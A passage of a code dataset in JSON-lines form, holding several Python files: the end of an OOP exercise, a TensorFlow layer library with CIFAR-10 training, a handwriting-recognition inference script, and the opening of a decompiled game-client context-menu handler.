Three\");\nmyShapes = Shapes()\nmyShapes.describeSelf()\nmyShapes.callAllMethodsOfTheClass()\n\nmyTriangle = Triangle();\nmyTriangle.describeSelf()\n\nmySquare = Square();\nmySquare.describeSelf();\n#input();\n\n","sub_path":"sourceCode/python/OOPSTrainingVersionThree.py","file_name":"OOPSTrainingVersionThree.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19170156","text":"import tensorflow as tf\nimport numpy as np\nimport sys, os,cv2\nfrom sklearn.utils import shuffle\nfrom scipy.misc import imread,imresize\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom skimage.transform import resize\nfrom imgaug import augmenters as iaa\nimport nibabel as nib\nimport imgaug as ia\nfrom scipy.ndimage import zoom\n\nplt.style.use('seaborn-white')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(6278)\ntf.set_random_seed(6728)\nia.seed(6278)\n\n# ======= Activation Function ==========\ndef tf_elu(x): return tf.nn.elu(x)\ndef d_tf_elu(x): return tf.cast(tf.greater(x,0),tf.float32) + (tf_elu(tf.cast(tf.less_equal(x,0),tf.float32) * x) + 1.0)\n\ndef tf_tanh(x): return tf.nn.tanh(x)\ndef d_tf_tanh(x): return 1 - tf_tanh(x) ** 2\n\ndef tf_sigmoid(x): return tf.nn.sigmoid(x) \ndef d_tf_sigmoid(x): return tf_sigmoid(x) * (1.0-tf_sigmoid(x))\n\ndef tf_atan(x): return tf.atan(x)\ndef d_tf_atan(x): return 1.0/(1.0 + x**2)\n\ndef tf_iden(x): return x\ndef d_tf_iden(x): return 1.0\n\ndef tf_softmax(x): return tf.nn.softmax(x)\ndef softabs(x): return tf.sqrt(x ** 2 + 1e-20)\n# ======= Activation Function ==========\n\n# ====== miscellaneous =====\n# code from: https://github.com/tensorflow/tensorflow/issues/8246\ndef tf_repeat(tensor, repeats):\n \"\"\"\n Args:\n\n input: A Tensor. 1-D or higher.\n repeats: A list. Number of repeat for each dimension, length must be the same as the number of dimensions in input\n\n Returns:\n \n A Tensor. Has the same type as input. Has the shape of tensor.shape * repeats\n \"\"\"\n expanded_tensor = tf.expand_dims(tensor, -1)\n multiples = [1] + repeats\n tiled_tensor = tf.tile(expanded_tensor, multiples = multiples)\n repeated_tesnor = tf.reshape(tiled_tensor, tf.shape(tensor) * repeats)\n return repeated_tesnor\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n# ====== miscellaneous =====\n\n# ================= LAYER CLASSES =================\nclass CNN():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n self.layer = tf.nn.conv2d(input,self.w,strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_part_3,filter_sizes = self.w.shape,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(input_sizes = [batch_size] + list(grad_part_3.shape[1:]),filter= self.w,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass CNN_3D():\n \n def __init__(self,filter_depth,filter_height,filter_width,in_channels,out_channels,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([filter_depth,filter_height,filter_width,in_channels,out_channels],stddev=0.05,seed=2,dtype=tf.float64))\n self.b = tf.Variable(tf.random_normal([out_channels],stddev=0.05,seed=2,dtype=tf.float64))\n self.act,self.d_act = act,d_act\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME',res=True):\n self.input = input\n self.layer = tf.nn.conv3d(input,self.w,strides=[1,1,1,1,1],padding=padding) + self.b\n self.layerA = self.act(self.layer)\n if res:\n return self.layerA + self.input\n else:\n return self.layerA \n\n def backprop(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass CNN_Trans():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n output_shape2 = self.input.shape[2].value * stride\n self.layer = tf.nn.conv2d_transpose(\n input,self.w,output_shape=[batch_size,output_shape2,output_shape2,self.w.shape[2].value],\n strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_middle,\n filter_sizes = self.w.shape,out_backprop = grad_part_3,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d(\n input=grad_middle,filter = self.w,strides=[1,stride,stride,1],padding=padding\n )\n \n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass RNN_CNN():\n\n def __init__(self,timestamp,c_in,c_out,x_kernel,h_kernel,size,act=tf_elu,d_act=d_tf_elu):\n\n self.w = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2,dtype=tf.float64))\n self.h = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2,dtype=tf.float64))\n\n self.act = act; self.d_act = d_act\n\n self.input_record = tf.Variable(tf.zeros([timestamp,batch_size,size,size,c_in],tf.float64))\n self.hidden_record = tf.Variable(tf.zeros([timestamp+1,batch_size,size,size,c_out],tf.float64))\n self.hiddenA_record = tf.Variable(tf.zeros([timestamp+1,batch_size,size,size,c_out],tf.float64))\n \n self.m_x,self.v_x = tf.Variable(tf.zeros_like(self.w,dtype=tf.float64)),tf.Variable(tf.zeros_like(self.w,dtype=tf.float64))\n self.m_h,self.v_h = tf.Variable(tf.zeros_like(self.h,dtype=tf.float64)),tf.Variable(tf.zeros_like(self.h,dtype=tf.float64))\n\n def feedfoward(self,input,timestamp):\n\n # assign the input for back prop\n hidden_assign = []\n hidden_assign.append(tf.assign(self.input_record[timestamp,:,:,:],input))\n\n # perform feed forward\n layer = tf.nn.conv2d(input,self.w,strides=[1,1,1,1],padding='SAME') + tf.nn.conv2d(self.hidden_record[timestamp,:,:,:,:],self.h,strides=[1,1,1,1],padding='SAME') \n layerA = self.act(layer)\n\n # assign for back prop\n hidden_assign.append(tf.assign(self.hidden_record[timestamp+1,:,:,:,:],layer))\n hidden_assign.append(tf.assign(self.hiddenA_record[timestamp+1,:,:,:,:],layerA))\n\n return layerA, hidden_assign \n\n def backprop(self,grad,timestamp):\n\n grad_1 = grad\n grad_2 = self.d_act(self.hidden_record[timestamp,:,:,:,:])\n grad_3_x = self.input_record[timestamp,:,:,:,:]\n grad_3_h = self.hiddenA_record[timestamp-1,:,:,:,:]\n\n grad_middle = grad_1 * grad_2\n\n grad_x = tf.nn.conv2d_backprop_filter(\n input=grad_3_x,filter_size = self.w.shape,\n out_backprop = grad_middle,strides=[1,1,1,1],padding='SAME'\n )\n\n grad_h = tf.nn.conv2d_backprop_filter(\n input=grad_3_h,filter_size = self.h.shape,\n out_backprop = grad_middle,strides=[1,1,1,1],padding='SAME'\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(\n input_size = self.hiddenA_record[timestamp-1,:,:,:].shape,\n filter=self.h,out_backprop = grad_middle,\n strides=[1,1,1,1],padding='SAME'\n )\n\n update_w = []\n # === update x ====\n update_w.append( tf.assign(self.m_x,beta_1*self.m_x + (1-beta_1) * grad_x) )\n update_w.append( tf.assign(self.v_x,beta_2*self.v_x + (1-beta_2) * grad_x ** 2) )\n m_hat_x = self.m_x/(1-beta_1)\n v_hat_x = self.v_x/(1-beta_2)\n adam_middle_x = learning_rate/(tf.sqrt(v_hat_x) + adam_e)\n update_w.append( tf.assign(self.w_x, tf.subtract(self.w_x,adam_middle_x*m_hat_x)) )\n\n # === update h ====\n update_w.append( tf.assign(self.m_h,beta_1*self.m_h + (1-beta_1) * grad_h) )\n update_w.append( tf.assign(self.v_h,beta_2*self.v_h + (1-beta_2) * grad_h ** 2) )\n m_hat_h = self.m_h/(1-beta_1)\n v_hat_h = self.v_h/(1-beta_2)\n adam_middle_h = learning_rate/(tf.sqrt(v_hat_h) + adam_e)\n update_w.append( tf.assign(self.w_h, tf.subtract(self.w_h,adam_middle_h*m_hat_h)) )\n \n return grad_pass,update_w\n \nclass ZigZag_RNN_CNN():\n\n def __init__(self,timestamp,c_in,c_out,x_kernel,h_kernel,size,act=tf_elu,d_act=d_tf_elu):\n \n self.w_1 = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2))\n self.h_1 = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2))\n\n self.act = act; self.d_act = d_act\n\n self.w_2 = tf.Variable(tf.random_normal([x_kernel,x_kernel,c_in,c_out],stddev=0.05,seed=2))\n self.h_2 = tf.Variable(tf.random_normal([h_kernel,h_kernel,c_out,c_out],stddev=0.05,seed=2))\n\n self.input_record_1 = tf.Variable(tf.zeros([timestamp,batch_size//2,size,size,c_in]))\n self.hidden_record_1 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n self.hiddenA_record_1 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n \n self.input_record_2 = tf.Variable(tf.zeros([timestamp,batch_size//2,size,size,c_in]))\n self.hidden_record_2 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n self.hiddenA_record_2 = tf.Variable(tf.zeros([timestamp+1,batch_size//2,size,size,c_out]))\n\n def feedforward_straight(self,input1,input2,timestamp):\n\n # assign the inputs \n hidden_assign = []\n \n # perform feed forward on left\n layer_1 = tf.nn.conv2d(input1,self.w_1,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_1[timestamp,:,:,:,:],self.h_1,strides=[1,1,1,1],padding='SAME') \n layerA_1 = self.act(layer_1)\n\n # perform feed forward on right\n layer_2 = tf.nn.conv2d(input2,self.w_2,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_2[timestamp,:,:,:,:],self.h_2,strides=[1,1,1,1],padding='SAME') \n layerA_2 = self.act(layer_2)\n \n # assign for left\n hidden_assign.append(tf.assign(self.hidden_record_1[timestamp+1,:,:,:,:],layer_1))\n hidden_assign.append(tf.assign(self.hiddenA_record_1[timestamp+1,:,:,:,:],layerA_1))\n\n # assign for right\n hidden_assign.append(tf.assign(self.hidden_record_2[timestamp+1,:,:,:,:],layer_2))\n hidden_assign.append(tf.assign(self.hiddenA_record_2[timestamp+1,:,:,:,:],layerA_2))\n\n return layerA_1,layerA_2,hidden_assign\n\n def feedforward_zigzag(self,input1,input2,timestamp):\n \n # assign the inputs \n hidden_assign = []\n \n # perform feed forward on left\n layer_1 = tf.nn.conv2d(input1,self.w_1,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_2[timestamp,:,:,:,:],self.h_1,strides=[1,1,1,1],padding='SAME') \n layerA_1 = self.d_act(layer_1)\n\n # perform feed forward on right\n layer_2 = tf.nn.conv2d(input2,self.w_2,strides=[1,1,1,1],padding='SAME') + \\\n tf.nn.conv2d(self.hiddenA_record_1[timestamp,:,:,:,:],self.h_2,strides=[1,1,1,1],padding='SAME') \n layerA_2 = self.d_act(layer_2)\n \n # assign for left\n hidden_assign.append(tf.assign(self.hidden_record_1[timestamp+1,:,:,:,:],layer_1))\n hidden_assign.append(tf.assign(self.hiddenA_record_1[timestamp+1,:,:,:,:],layerA_1))\n\n # assign for right\n hidden_assign.append(tf.assign(self.hidden_record_2[timestamp+1,:,:,:,:],layer_2))\n hidden_assign.append(tf.assign(self.hiddenA_record_2[timestamp+1,:,:,:,:],layerA_2))\n\n return layerA_1,layerA_2,hidden_assign\n\nclass LSTM_CNN():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass FNN():\n \n def __init__(self,input_dim,hidden_dim,act,d_act):\n self.w = tf.Variable(tf.random_normal([input_dim,hidden_dim], stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.v_hat_prev = tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return [self.w]\n\n def feedforward(self,input=None):\n self.input = input\n self.layer = tf.matmul(input,self.w)\n self.layerA = self.act(self.layer)\n return self.layerA\n\n def backprop(self,gradient=None):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n grad = tf.matmul(tf.transpose(grad_part_3),grad_middle)\n grad_pass = tf.matmul(tf.multiply(grad_part_1,grad_part_2),tf.transpose(self.w))\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass RNN():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass LSTM():\n \n def __init__(self):\n raise NotImplementedError(\"Not Implemented Yet\")\n\nclass ICA_Layer():\n\n def __init__(self,inc):\n self.w_ica = tf.Variable(tf.random_normal([inc,inc],stddev=0.05,seed=2)) \n\n def feedforward(self,input):\n self.input = input\n self.ica_est = tf.matmul(input,self.w_ica)\n self.ica_est_act = tf_atan(self.ica_est)\n return self.ica_est_act\n\n def backprop(self):\n grad_part_2 = d_tf_atan(self.ica_est)\n grad_part_3 = self.input\n\n grad_pass = tf.matmul(grad_part_2,tf.transpose(self.w_ica))\n g_tf = tf.linalg.inv(tf.transpose(self.w_ica)) - (2/batch_size) * tf.matmul(tf.transpose(self.input),self.ica_est_act)\n\n update_w = []\n update_w.append(tf.assign(self.w_ica,self.w_ica+0.2*g_tf))\n\n return grad_pass,update_w \n\nclass Sparse_Filter_Layer():\n \n def __init__(self,outc,changec):\n self.w = tf.Variable(tf.random_normal([outc,changec],stddev=1.0,seed=2,dtype=tf.float64))\n self.epsilon = 1e-20\n\n def getw(self): return self.w\n\n def soft_abs(self,value):\n return tf.sqrt(value ** 2 + self.epsilon)\n\n def feedforward(self,input):\n self.sparse_layer = tf.matmul(input,self.w)\n second = self.soft_abs(self.sparse_layer )\n third = tf.divide(second,tf.sqrt(tf.reduce_sum(second**2,axis=0)+self.epsilon))\n four = tf.divide(third,tf.sqrt(tf.reduce_sum(third**2,axis=1)[:,tf.newaxis] +self.epsilon))\n self.cost_update = tf.reduce_mean(four)\n return self.sparse_layer ,self.cost_update\n\nclass SOM_Layer(): \n\n def __init__(self,m,n,dim,num_epoch,learning_rate_som = 0.04,radius_factor = 1.1, gaussian_std=0.5):\n \n self.m = m\n self.n = n\n self.dim = dim\n self.gaussian_std = gaussian_std\n self.num_epoch = num_epoch\n # self.map = tf.Variable(tf.random_uniform(shape=[m*n,dim],minval=0,maxval=1,seed=2))\n self.map = tf.Variable(tf.random_normal(shape=[m*n,dim],seed=2))\n\n self.location_vects = tf.constant(np.array(list(self._neuron_locations(m, n))))\n self.alpha = learning_rate_som\n self.sigma = max(m,n)*1.1\n\n def _neuron_locations(self, m, n):\n \"\"\"\n Yields one by one the 2-D locations of the individual neurons in the SOM.\n \"\"\"\n # Nested iterations over both dimensions to generate all 2-D locations in the map\n for i in range(m):\n for j in range(n):\n yield np.array([i, j])\n\n def getmap(self): return self.map\n def getlocation(self): return self.bmu_locs\n\n def feedforward(self,input):\n \n self.input = input\n self.grad_pass = tf.pow(tf.subtract(tf.expand_dims(self.map, axis=0),tf.expand_dims(self.input, axis=1)), 2)\n self.squared_distance = tf.reduce_sum(self.grad_pass, 2)\n self.bmu_indices = tf.argmin(self.squared_distance, axis=1)\n self.bmu_locs = tf.reshape(tf.gather(self.location_vects, self.bmu_indices), [-1, 2])\n\n def backprop(self,iter,num_epoch):\n\n # Update the weigths \n radius = tf.subtract(self.sigma,\n tf.multiply(iter,\n tf.divide(tf.cast(tf.subtract(self.alpha, 1),tf.float32),\n tf.cast(tf.subtract(num_epoch, 1),tf.float32))))\n\n alpha = tf.subtract(self.alpha,\n tf.multiply(iter,\n tf.divide(tf.cast(tf.subtract(self.alpha, 1),tf.float32),\n tf.cast(tf.subtract(num_epoch, 1),tf.float32))))\n\n self.bmu_distance_squares = tf.reduce_sum(\n tf.pow(tf.subtract(\n tf.expand_dims(self.location_vects, axis=0),\n tf.expand_dims(self.bmu_locs, axis=1)), 2), \n 2)\n\n self.neighbourhood_func = tf.exp(tf.divide(tf.negative(tf.cast(\n self.bmu_distance_squares, \"float32\")), tf.multiply(\n tf.square(tf.multiply(radius, self.gaussian_std)), 2)))\n\n self.learning_rate_op = tf.multiply(self.neighbourhood_func, alpha)\n \n self.numerator = tf.reduce_sum(\n tf.multiply(tf.expand_dims(self.learning_rate_op, axis=-1),\n tf.expand_dims(self.input, axis=1)), axis=0)\n\n self.denominator = tf.expand_dims(\n tf.reduce_sum(self.learning_rate_op,axis=0) + float(1e-20), axis=-1)\n\n self.new_weights = tf.div(self.numerator, self.denominator)\n self.update = [tf.assign(self.map, self.new_weights)]\n\n return self.update,tf.reduce_mean(self.grad_pass, 1)\n# ================= LAYER CLASSES =================\n\n# data\nPathDicom = \"../../Dataset/cifar-10-batches-py/\"\nlstFilesDCM = [] # create an empty list\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if not \".html\" in filename.lower() and not \".meta\" in filename.lower(): # check whether the file's DICOM\n lstFilesDCM.append(os.path.join(dirName,filename))\n\n# Read the data traind and Test\nbatch0 = unpickle(lstFilesDCM[0])\nbatch1 = unpickle(lstFilesDCM[1])\nbatch2 = unpickle(lstFilesDCM[2])\nbatch3 = unpickle(lstFilesDCM[3])\nbatch4 = unpickle(lstFilesDCM[4])\n\nonehot_encoder = OneHotEncoder(sparse=True)\ntrain_batch = np.vstack((batch0[b'data'],batch1[b'data'],batch2[b'data'],batch3[b'data'],batch4[b'data']))\ntrain_label = np.expand_dims(np.hstack((batch0[b'labels'],batch1[b'labels'],batch2[b'labels'],batch3[b'labels'],batch4[b'labels'])).T,axis=1).astype(np.float64)\ntrain_label = onehot_encoder.fit_transform(train_label).toarray().astype(np.float64)\n\ntest_batch = unpickle(lstFilesDCM[5])[b'data']\ntest_label = np.expand_dims(np.array(unpickle(lstFilesDCM[5])[b'labels']),axis=0).T.astype(np.float64)\ntest_label = onehot_encoder.fit_transform(test_label).toarray().astype(np.float64)\n\n# reshape data\ntrain_batch = np.reshape(train_batch,(len(train_batch),3,32,32))\ntest_batch = np.reshape(test_batch,(len(test_batch),3,32,32))\n\n# rotate data\ntrain_batch = np.rot90(np.rot90(train_batch,1,axes=(1,3)),3,axes=(1,2)).astype(np.float64)\ntest_batch = np.rot90(np.rot90(test_batch,1,axes=(1,3)),3,axes=(1,2)).astype(np.float64)\n\n# normalize \ntrain_batch= train_batch/255.0\ntest_batch = test_batch/255.0\n\n# print out the data shape and the max and min value\nprint('------------------------------')\nprint(train_batch.shape)\nprint(train_batch.max())\nprint(train_batch.min())\nprint(train_label.shape)\nprint(train_label.max())\nprint(train_label.min())\nprint(test_batch.shape)\nprint(test_batch.max())\nprint(test_batch.min())\nprint(test_label.shape)\nprint(test_label.max())\nprint(test_label.min())\nprint('------------------------------')\n\n# hyper \nnum_epoch = 3000\nlearning_rate = 0.000001\nbatch_size = 20\nprint_size = 10\ntime_stamp = 3\n\nbeta1,beta2,adam_e = 0.9,0.999,1e-8\n\n# class\nl0 = CNN(3,3,96)\nl1 = RNN_CNN(time_stamp,32,64,5,3,16)\nl2 = CNN(3,64,192)\nl3 = RNN_CNN(time_stamp,64,128,5,3,4)\nl4 = CNN(1,128,10)\n\n# graph\nx = tf.placeholder(shape=[batch_size,32,32,3],dtype=tf.float64)\ny = tf.placeholder(shape=[batch_size,10],dtype=tf.float64)\n\nlayer0 = l0.feedforward(x)\nlayer0_pool = tf.nn.avg_pool(layer0,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\nlayer0_reshape = tf.reshape(layer0_pool,[batch_size,16,16,32,time_stamp])\n\nlayer1_full = [] ; layer1_update = []\nfor current_time_stamp in range(time_stamp):\n layer1_temp,layer1_assign = l1.feedfoward(layer0_reshape[:,:,:,:,current_time_stamp],current_time_stamp)\n layer1_full.append(layer1_temp)\n layer1_update.append(layer1_assign)\nlayer1_ouput =layer1_full[0] + layer1_full[1] + layer1_full[2]\nlayer1_pool = tf.nn.avg_pool(layer1_ouput,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\n\nlayer2 = l2.feedforward(layer1_pool)\nlayer2_pool = tf.nn.avg_pool(layer2,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\nlayer2_reshape = tf.reshape(layer2_pool,[batch_size,4,4,64,time_stamp])\n\nlayer3_full = [] ; layer3_update = []\nfor current_time_stamp in range(time_stamp):\n layer3_temp,layer3_assign = l3.feedfoward(layer2_reshape[:,:,:,:,current_time_stamp],current_time_stamp)\n layer3_full.append(layer3_temp)\n layer3_update.append(layer3_assign)\nlayer3_ouput = layer3_full[0] + layer3_full[1] + layer3_full[2]\n\nlayer4 = l4.feedforward(layer3_ouput)\nlayer4_pool = tf.reduce_mean(layer4,(1,2))\nfinal_soft = tf_softmax(layer4_pool)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer4_pool,labels=y))\ncorrect_prediction = tf.equal(tf.argmax(final_soft, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float64))\n\nauto_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# session\nwith tf.Session() as sess:\n\n sess.run(tf.global_variables_initializer())\n \n train_cota,train_acca = 0,0\n train_cot,train_acc = [],[]\n \n test_cota,test_acca = 0,0\n test_cot,test_acc = [],[]\n\n for iter in range(num_epoch):\n\n train_batch,train_label = shuffle(train_batch,train_label)\n\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size]\n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n\n sess_result = sess.run([cost,accuracy,auto_train,correct_prediction,layer1_full,\n layer1_update,layer3_full,layer3_update,final_soft,layer4_pool],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter, \" current batch: \",batch_size_index, ' Current cost: ', sess_result[0],' Current Acc: ', sess_result[1],end='\\r')\n train_cota = train_cota + sess_result[0]\n train_acca = train_acca + sess_result[1]\n \n for test_batch_index in range(0,len(test_batch),batch_size):\n current_batch = test_batch[test_batch_index:test_batch_index+batch_size]\n current_batch_label = test_label[test_batch_index:test_batch_index+batch_size]\n\n sess_result = sess.run([cost,accuracy,correct_prediction,layer1_full,\n layer1_update,layer3_full,layer3_update,final_soft,layer4_pool],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter, \" current batch: \",test_batch_index, ' Current cost: ', sess_result[0],' Current Acc: ', sess_result[1],end='\\r')\n test_acca = sess_result[1] + test_acca\n test_cota = sess_result[0] + test_cota\n\n if iter % print_size==0:\n print(\"\\n-----------------\")\n print('Train Current cost: ', train_cota/(len(train_batch)/batch_size),' Current Acc: ', train_acca/(len(train_batch)/batch_size),end='\\n')\n print('Test Current cost: ', test_cota/(len(test_batch)/batch_size),' Current Acc: ', test_acca/(len(test_batch)/batch_size),end='\\n')\n print(\"-----------------\")\n\n train_acc.append(train_acca/(len(train_batch)/batch_size))\n train_cot.append(train_cota/(len(train_batch)/batch_size))\n test_acc.append(test_acca/(len(test_batch)/batch_size))\n test_cot.append(test_cota/(len(test_batch)/batch_size))\n test_cota,test_acca = 0,0\n train_cota,train_acca = 0,0\n\n # training done\n plt.figure(figsize=(10, 10))\n plt.plot(range(len(train_acc)),train_acc,color='red',label='acc ovt')\n plt.plot(range(len(train_cot)),train_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Train Average Accuracy / Cost Over Time\")\n plt.show()\n\n plt.figure(figsize=(10, 10))\n plt.plot(range(len(test_acc)),test_acc,color='red',label='acc ovt')\n plt.plot(range(len(test_cot)),test_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Test Average Accuracy / Cost Over Time\")\n plt.show()\n\n# -- end code --","sub_path":"NeuralNetwork/Bio_CNN/b_rcnn.py","file_name":"b_rcnn.py","file_ext":"py","file_size_in_byte":26907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436516592","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport cv2\nfrom DataLoader import Batch\nfrom Model import Model, DecoderType\nfrom SamplePreprocessor import preprocess\nimport os\n# from spellchecker import SpellChecker\n\n\nclass FilePaths:\n \"filenames and paths to data\"\n fnCharList = '../model/charList.txt'\n fnInfer = '../out/'\n\ndef infer(model, fnImg):\n \"recognize text in image provided by file path\"\n img = preprocess(cv2.imread(fnImg, cv2.IMREAD_GRAYSCALE), Model.imgSize)\n batch = Batch(None, [img])\n (recognized, probability) = model.inferBatch(batch, True)\n print('Recognized:', '\"' + recognized[0] + '\"')\n print('Probability:', probability[0])\n return recognized[0], probability[0]\n\ndef recognize():\n decoderType = DecoderType.WordBeamSearch\n model = Model(open(FilePaths.fnCharList).read(), decoderType, mustRestore=True)\n folderNumber = 0\n file = open('../out/summary.txt', 'w')\n file.close()\n # spell = SpellChecker()\n if os.path.isdir(FilePaths.fnInfer):\n probability = 0\n count = 0\n while os.path.isdir(FilePaths.fnInfer + str(folderNumber) + '/'):\n folder = FilePaths.fnInfer + str(folderNumber) + '/'\n fileNumber = 0\n while os.path.isfile(folder + str(fileNumber) + '.png'):\n file = folder + str(fileNumber) + '.png'\n print(file)\n word, wordProbability = infer(model, os.path.abspath(file))\n probability += wordProbability\n count += 1\n # misspelled = spell.unknown([word])\n file = open('../out/summary.txt', 'a')\n # if len(misspelled) is not 0:\n # for item in misspelled:\n # word = spell.correction(item)\n file.write(word + ' ')\n file.close()\n fileNumber += 1\n folderNumber += 1\n file = open('../out/summary.txt', 'a')\n file.write('\\n')\n file.close()\n probability = probability / count\n print('Average page probability: ', probability*100)\n","sub_path":"linux/src/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211396283","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/storage/storage_cm_handlers.py\nfrom adisp import process\nfrom gui import DialogsInterface\nfrom gui.Scaleform.daapi.view.dialogs.ConfirmModuleMeta import SellModuleMeta\nfrom gui.Scaleform.daapi.view.lobby.storage.storage_helpers import showStorageModuleInfo\nfrom gui.Scaleform.framework.entities.EventSystemEntity import EventSystemEntity\nfrom gui.Scaleform.framework.managers.context_menu import AbstractContextMenuHandler\nfrom gui.Scaleform.locale.MENU import MENU\nfrom gui.shared import events, EVENT_BUS_SCOPE\nfrom helpers import dependency\nfrom skeletons.gui.customization import ICustomizationService\nfrom skeletons.gui.shared import IItemsCache\n\nclass _StorageOptions(object):\n INFORMATION = 'information'\n SELL = 'sell'\n SALE_OPTION = 'saleOption'\n\n\nclass StorageForSellItemCMHandler(AbstractContextMenuHandler, EventSystemEntity):\n itemsCache = dependency.descriptor(IItemsCache)\n service = dependency.descriptor(ICustomizationService)\n\n def __init__(self, cmProxy, ctx=None):\n self._intCD = 0\n 